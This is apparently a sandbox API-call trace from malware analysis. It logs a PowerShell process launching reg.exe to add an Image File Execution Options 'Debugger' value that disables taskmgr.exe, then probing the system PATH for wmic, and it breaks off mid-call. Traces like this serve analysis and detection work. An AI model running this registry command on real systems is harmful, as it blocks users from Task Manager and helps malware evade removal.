out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.084] CoTaskMemFree (pv=0x2af7b0) [0240.084] CommandLineToArgvW (in: lpCmdLine=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", pNumArgs=0x1c98e280 | out: pNumArgs=0x1c98e280) returned 0x228340*="" [0240.084] lstrlenW (lpString="ADD") returned 3 [0240.084] CoTaskMemAlloc (cb=0xa) returned 0x1b9cc810 [0240.084] RtlMoveMemory (in: Destination=0x1b9cc810, Source=0x22839a, Length=0x8 | out: Destination=0x1b9cc810) [0240.084] CoTaskMemFree (pv=0x1b9cc810) [0240.084] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0240.084] CoTaskMemAlloc (cb=0xb8) returned 0x29a040 [0240.084] RtlMoveMemory (in: Destination=0x29a040, Source=0x2283a2, Length=0xb6 | out: Destination=0x29a040) [0240.084] CoTaskMemFree (pv=0x29a040) [0240.084] lstrlenW (lpString="/f") returned 2 [0240.084] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0240.084] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x228458, Length=0x6 | out: Destination=0x1b9c9070) [0240.084] CoTaskMemFree (pv=0x1b9c9070) [0240.084] lstrlenW (lpString="/v") returned 2 [0240.084] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0240.084] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x22845e, Length=0x6 | out: Destination=0x1b9c9070) [0240.085] CoTaskMemFree (pv=0x1b9c9070) [0240.085] lstrlenW (lpString="Debugger") returned 8 [0240.085] CoTaskMemAlloc (cb=0x14) returned 0x1b9cc810 [0240.085] RtlMoveMemory (in: Destination=0x1b9cc810, Source=0x228464, Length=0x12 | out: Destination=0x1b9cc810) [0240.085] CoTaskMemFree (pv=0x1b9cc810) [0240.085] lstrlenW (lpString="/t") returned 2 [0240.085] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0240.085] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x228476, Length=0x6 | out: Destination=0x1b9c9070) [0240.085] CoTaskMemFree (pv=0x1b9c9070) [0240.085] lstrlenW (lpString="REG_SZ") returned 6 [0240.085] CoTaskMemAlloc (cb=0x10) returned 0x1b9cc810 [0240.085] RtlMoveMemory (in: Destination=0x1b9cc810, Source=0x22847c, Length=0xe | out: Destination=0x1b9cc810) [0240.085] CoTaskMemFree (pv=0x1b9cc810) [0240.085] lstrlenW (lpString="/d") returned 2 [0240.085] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0240.085] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x22848a, Length=0x6 | out: Destination=0x1b9c9070) [0240.085] CoTaskMemFree (pv=0x1b9c9070) [0240.085] lstrlenW (lpString="Hotkey Disabled") returned 15 [0240.085] CoTaskMemAlloc (cb=0x22) returned 0x1b9b1010 [0240.085] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x228490, Length=0x20 | out: Destination=0x1b9b1010) [0240.085] CoTaskMemFree (pv=0x1b9b1010) [0240.085] LocalFree (hMem=0x228340) returned 0x0 [0240.086] CoTaskMemAlloc (cb=0x804) returned 0x1b9db2f0 [0240.086] GetConsoleTitleW (in: lpConsoleTitle=0x1b9db2f0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0240.086] CoTaskMemFree (pv=0x1b9db2f0) [0240.086] CoTaskMemAlloc (cb=0x15e) returned 0x228340 [0240.087] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c98e1e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x309a2b0 | out: lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessInformation=0x309a2b0*(hProcess=0x468, hThread=0x464, dwProcessId=0xb40, dwThreadId=0xb28)) returned 1 [0240.090] CoTaskMemFree (pv=0x228340) [0240.090] CloseHandle (hObject=0x464) returned 1 [0240.090] CoTaskMemAlloc (cb=0x1d) returned 0x1b9b1010 [0240.090] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c98e288, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98e288) returned 0x4550 [0240.091] CoTaskMemFree (pv=0x1b9b1010) [0240.091] GetCurrentProcess () returned 0xffffffffffffffff [0240.091] GetCurrentProcess () returned 0xffffffffffffffff [0240.091] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x468, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c98e368, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c98e368*=0x464) returned 1 [0240.182] CloseHandle (hObject=0x464) returned 1 [0240.182] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x1c98e3d8 | out: lpExitCode=0x1c98e3d8*=0x0) returned 1 [0240.182] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0240.184] CloseHandle (hObject=0x468) returned 1 [0240.184] SetEvent (hEvent=0x434) returned 1 [0240.184] SetEvent (hEvent=0x428) returned 1 [0240.184] SetEvent (hEvent=0x42c) returned 1 [0240.184] SetEvent (hEvent=0x430) returned 1 [0240.184] SetEvent (hEvent=0x444) returned 1 [0240.184] SetEvent (hEvent=0x438) returned 1 [0240.185] SetEvent (hEvent=0x43c) returned 1 [0240.185] SetEvent (hEvent=0x440) returned 1 [0240.185] SetEvent (hEvent=0x448) returned 1 [0240.185] CoUninitialize () Thread: id = 124 os_tid = 0xa60 [0240.215] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0240.217] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0240.218] VirtualQuery (in: lpAddress=0x1c90d660, lpBuffer=0x1c90e520, dwLength=0x30 | out: lpBuffer=0x1c90e520*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0240.220] VirtualQuery (in: lpAddress=0x1c90d910, lpBuffer=0x1c90e7d0, dwLength=0x30 | out: lpBuffer=0x1c90e7d0*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0240.223] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.223] CoTaskMemFree (pv=0x2af7b0) [0240.223] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0240.223] CoTaskMemFree (pv=0x2af7b0) [0240.224] CoTaskMemAlloc (cb=0x20e) returned 0x2bb750 [0240.224] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bb750 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0240.224] CoTaskMemFree (pv=0x2bb750) [0240.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.224] SetErrorMode (uMode=0x1) returned 0x1 [0240.225] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.225] SetErrorMode (uMode=0x1) returned 0x1 [0240.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.225] SetErrorMode (uMode=0x1) returned 0x1 [0240.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.226] SetErrorMode (uMode=0x1) returned 0x1 [0240.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.226] SetErrorMode (uMode=0x1) returned 0x1 [0240.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.227] SetErrorMode (uMode=0x1) returned 0x1 [0240.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.227] SetErrorMode (uMode=0x1) returned 0x1 [0240.227] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.227] SetErrorMode (uMode=0x1) returned 0x1 [0240.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.228] SetErrorMode (uMode=0x1) returned 0x1 [0240.228] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.228] SetErrorMode (uMode=0x1) returned 0x1 [0240.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.228] SetErrorMode (uMode=0x1) returned 0x1 [0240.229] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.229] SetErrorMode (uMode=0x1) returned 0x1 [0240.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.229] SetErrorMode (uMode=0x1) returned 0x1 [0240.229] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.230] SetErrorMode (uMode=0x1) returned 0x1 [0240.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.230] SetErrorMode (uMode=0x1) returned 0x1 [0240.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.230] SetErrorMode (uMode=0x1) returned 0x1 [0240.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.231] SetErrorMode (uMode=0x1) returned 0x1 [0240.231] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.231] SetErrorMode (uMode=0x1) returned 0x1 [0240.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.231] SetErrorMode (uMode=0x1) returned 0x1 [0240.231] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.232] SetErrorMode (uMode=0x1) returned 0x1 [0240.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.232] SetErrorMode (uMode=0x1) returned 0x1 [0240.232] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.232] SetErrorMode (uMode=0x1) returned 0x1 [0240.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.233] SetErrorMode (uMode=0x1) returned 0x1 [0240.233] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.233] SetErrorMode (uMode=0x1) returned 0x1 [0240.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.234] SetErrorMode (uMode=0x1) returned 0x1 [0240.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.234] SetErrorMode (uMode=0x1) returned 0x1 [0240.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.234] SetErrorMode (uMode=0x1) returned 0x1 [0240.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.235] SetErrorMode (uMode=0x1) returned 0x1 [0240.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.235] SetErrorMode (uMode=0x1) returned 0x1 [0240.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.235] SetErrorMode (uMode=0x1) returned 0x1 [0240.235] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.236] SetErrorMode (uMode=0x1) returned 0x1 [0240.236] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.236] SetErrorMode (uMode=0x1) returned 0x1 [0240.236] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.236] SetErrorMode (uMode=0x1) returned 0x1 [0240.237] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.237] SetErrorMode (uMode=0x1) returned 0x1 [0240.237] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.237] SetErrorMode (uMode=0x1) returned 0x1 [0240.237] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.237] SetErrorMode (uMode=0x1) returned 0x1 [0240.238] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.238] SetErrorMode (uMode=0x1) returned 0x1 [0240.238] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.238] SetErrorMode (uMode=0x1) returned 0x1 [0240.238] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.239] SetErrorMode (uMode=0x1) returned 0x1 [0240.239] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.239] SetErrorMode (uMode=0x1) returned 0x1 [0240.239] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.239] SetErrorMode (uMode=0x1) returned 0x1 [0240.239] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.240] SetErrorMode (uMode=0x1) returned 0x1 [0240.240] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0240.240] SetErrorMode (uMode=0x1) returned 0x1 [0240.240] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c90d840 | out: lpFindFileData=0x1c90d840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.240] SetErrorMode (uMode=0x1) returned 0x1 [0240.241] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, 